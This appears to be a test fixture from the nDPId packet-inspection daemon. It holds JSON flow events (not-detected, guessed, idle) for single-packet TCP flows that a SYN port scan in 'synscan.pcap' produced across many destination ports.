+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 